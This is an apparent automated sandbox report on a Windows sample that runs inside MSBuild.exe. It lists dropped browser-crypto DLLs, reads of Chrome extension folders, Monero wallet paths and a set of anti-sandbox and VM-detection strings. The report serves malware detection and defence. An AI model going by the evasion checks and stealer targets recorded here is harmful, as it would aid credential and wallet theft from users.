Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: textshaping.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.3374207350.000000003819C000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.3369474050.000000002C2B8000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00418A63

Source: sql[1].dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x263795
Source: file.exe	Static PE information: real checksum: 0x9a9ac should be: 0x96a57

Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: sql[1].dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105B142 push ecx; ret	0_2_0105B155
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105B3A6 push ds; retn 0003h	0_2_0105B395
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105B2E0 push ds; retn 0003h	0_2_0105B395
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105B45C push ds; retf 0003h	0_2_0105B45D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105D9F5 push 0000004Ch; iretd	0_2_0105DA06
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01049DB5 push ecx; ret	0_2_01049DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01006EF4 push ecx; ret	0_2_01006F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0042F262 push ecx; ret	1_2_0042F275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00422E59 push esi; ret	1_2_00422E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041DED5 push ecx; ret	1_2_0041DEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00432715 push 0000004Ch; iretd	1_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4CB536 push ecx; ret	1_2_6C4CB549

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

1_2_00418A63

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 1.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.102cae0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.102cae0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2000, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: file.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

1_2_0040180D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1385			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 2863			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 8.5 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

1_2_00410DDB

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101980F FindFirstFileExW,	0_2_0101980F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	1_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	1_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	1_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

1_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00410FBA GetSystemInfo,wsprintfA,

1_2_00410FBA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: DAKJDH.1.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: DAKJDH.1.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: DAKJDH.1.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DAKJDH.1.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: DAKJDH.1.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: DAKJDH.1.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: DAKJDH.1.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: DAKJDH.1.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: DAKJDH.1.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: DAKJDH.1.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000E98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: DAKJDH.1.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: DAKJDH.1.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: DAKJDH.1.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: DAKJDH.1.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: DAKJDH.1.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: DAKJDH.1.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: DAKJDH.1.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: DAKJDH.1.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: DAKJDH.1.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: DAKJDH.1.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: DAKJDH.1.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: DAKJDH.1.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: DAKJDH.1.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: DAKJDH.1.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: DAKJDH.1.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: DAKJDH.1.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: DAKJDH.1.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: DAKJDH.1.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: DAKJDH.1.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
